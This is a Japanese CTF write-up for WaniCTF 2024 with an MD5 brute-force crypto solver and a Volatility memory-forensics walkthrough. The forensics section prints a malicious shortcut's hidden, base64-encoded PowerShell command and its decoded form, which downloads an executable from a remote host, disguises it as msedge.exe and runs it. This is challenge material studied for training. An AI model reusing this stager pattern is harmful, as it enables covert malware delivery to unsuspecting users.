WaniCTF 2024 Writeup

Last updated at 2024-06-23Posted at 2024-06-23

楽しかった問題だけ。

Crypto

replacement

chall.pyを検証
FLAG{}のFはどこ？

>>> import hashlib
>>> x = ord('F')
>>> x
70
>>> x = hashlib.md5(str(x).encode()).hexdigest()
>>> x
'7cbbc409ec990f19c78c75bd1e06f215'
>>> int(x, 16)
165799207128434858641672726827070059029

my_diary_11_8_Wednesday.txt内に165799207128434858641672726827070059029は？

ある。

では総当たりで。

solver.py

import hashlib

enc = [165799207128434858641672726827070059029, 334755564751598048042394781213255939012, 335344749019279195985775024993445213947, 301423883473918993177634428163190101268, 42767516990368493138776584305024125808, 324787361952219506718126426467652498112, 53459933652527578064242465506376923016, 75371056103973480373443517203033791314, 169393384228144871625990433807197966773, 217694107356916866121607052237984398603, 204791166937441563272975036703176244680, 229138548907862643092856609226723050075, 75371056103973480373443517203033791314, 52025852590564328496031723616521325469, 53459933652527578064242465506376923016, 127044987962124214100696270195559210814, 260950720930659604756740365450507371663, 82324359399928500054185503234815398877, 302282648683284548814202807340787655613, 289548202804218369273708443831392368399, 132117099947440863086225782187112663809, 67435298396569627229809714987765527069, 140302709094137701773086334180578563688, 10477030623836167233684437098032507967, 132117099947440863086225782187112663809, 57512852240092789512489991536185408584, 260950720930659604756740365450507371663, 127360297788558372456973998053019048669, 301648155472379285594517050531127483548, 127044987962124214100696270195559210814, 140175431361313732288440547599619953992, 75371056103973480373443517203033791314, 32129299595146848534093479265394572654, 281595222973318803755638905082365601824, 281595222973318803755638905082365601824, 301423883473918993177634428163190101268, 312483091106876729395161500591121481064, 127360297788558372456973998053019048669, 75371056103973480373443517203033791314, 135217442928347349540220511812067137647, 57512852240092789512489991536185408584, 101473043316046160883738884593606957434, 301648155472379285594517050531127483548]
ans = []
flag_string = "FLAG{}abcdefghijklmnopqrstuvwxyz01234567890_"

print(enc)

for e in enc:
    #print(e)
    for s in flag_string:
        #print(s)
        x = ord(s)
        x = hashlib.md5(str(x).encode()).hexdigest()
        if e == int(x, 16):
            ans.append(s)
            
#print(str(ans))
print(''.join(ans))

Forensics

mem_search

PowerShell.exe
cmd.exe（conhost.exe）
など不審なプロセスがdumpできない。

cmdlineにもヒント無し。

後は、ファイルだけだが、ノーヒント（不審ファイルのhandlesも取得できない）なので全部見るしかない

┌──(kali㉿kali)-[~/volatility3]
└─$ python3 vol.py -f chal_mem_search.DUMP windows.filescan > filescan.txt

上から全部見ていくと、
0xcd88ceb9f2b0 \Users\Mikka\Desktop\echo.txt 216
が不審なことに気づく

┌──(kali㉿kali)-[~/volatility3]
└─$ python3 vol.py -f chal_mem_search.DUMP windows.dumpfiles --virtaddr 0xcd88ceb9f2b0

Volatility 3 Framework 2.7.1
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xcd88ceb9f2b0  echo.txt        file.0xcd88ceb9f2b0.0xcd88cd76fcf0.DataSectionObject.echo.txt.dat

┌──(kali㉿kali)-[~/volatility3]
└─$ cat file.0xcd88ceb9f2b0.0xcd88cd76fcf0.DataSectionObject.echo.txt.dat 
FAKEFAKEFAEKFAKEKFAKEDAKIFIOEAGVOAENGVO

FAKEとあり、FLAG{}が近いと確信。

デスクトップにフォーカス
0xcd88cebc26c0 \Users\Mikka\Desktop\read_this_as_admin.lnknload 216
これか？

┌──(kali㉿kali)-[~/volatility3]
└─$ python3 vol.py -f chal_mem_search.DUMP windows.dumpfiles --virtaddr 0xcd88cebc26c0
Volatility 3 Framework 2.7.1
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xcd88cebc26c0  read_this_as_admin.lnknload     file.0xcd88cebc26c0.0xcd88ced4e5f0.DataSectionObject.read_this_as_admin.lnknload.dat
                                                                                                                                                                                           
┌──(kali㉿kali)-[~/volatility3]
└─$ cat file.0xcd88cebc26c0.0xcd88ced4e5f0.DataSectionObject.read_this_as_admin.lnknload.dat 
�8O� �:i�+00�/C:\V1�X3�Windows@ ﾇOwH�X�J.��
  WindowsZ1�X{cSystem32B        ﾇOwH�X�J.k���erSystem32▒t1�O�IWindowsPowerShellT        ﾇO�I�X�H.�����WindowsPowerShell N1�X4�v1.0:     ﾇO�I�XDK.��'>�v1.0l2�PX@
                                                                                                                                                                 powershell.exeN        ��PX@
  �X�B.hi#���'powershell.exeh-gt$�C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe?..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32�-window hidden -noni -enc JAB1AD0AJwBoAHQAJwArACcAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQA2ADoAOAAyADgAMgAvAEIANgA0AF8AZABlAGMAJwArACcAbwBkAGUAXwBSAGsAeABCAFIAMwB0AEUAWQBYAGwAMQBiAFYAOQAwAGEARwBsAHoAWAAnACsAJwAyAGwAegBYADMATgBsAFkAMwBKAGwAZABGADkAbQBhAFcAeABsAGYAUQAlADMAJwArACcARAAlADMARAAvAGMAaABhAGwAbABfAG0AZQBtAF8AcwBlACcAKwAnAGEAcgBjAGgALgBlACcAKwAnAHgAZQAnADsAJAB0AD0AJwBXAGEAbgAnACsAJwBpAFQAZQBtACcAKwAnAHAAJwA7AG0AawBkAGkAcgAgAC0AZgBvAHIAYwBlACAAJABlAG4AdgA6AFQATQBQAFwALgAuAFwAJAB0ADsAdAByAHkAewBpAHcAcgAgACQAdQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZABcAG0AcwBlAGQAZwBlAC4AZQB4AGUAOwAmACAAJABkAFwAbQBzAGUAZABnAGUALgBlAHgAZQA7AH0AYwBhAHQAYwBoAHsAfQA=C:\hack\shared\read_this.docx�%SystemDrive%\hack\shared\read_this.docx%SystemDrive%\hack\shared\read_this.docx�%�
�����Kp\��1SPS��XF�L8C���&�m�q/S-1-5-21-1812296582-1250191020-2086791148-100191SPS�mD��pH�H@.�=x�hH�o�P

base64

$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX'+'2lzX3NlY3JldF9maWxlfQ%3'+'D%3D/chall_mem_se'+'arch.e'+'xe';$t='Wan'+'iTem'+'p';mkdir -force $env:TMP\..\$t;try{iwr $u -OutFile $d\msedge.exe;& $d\msedge.exe;}catch{}

RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ

ビンゴ

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up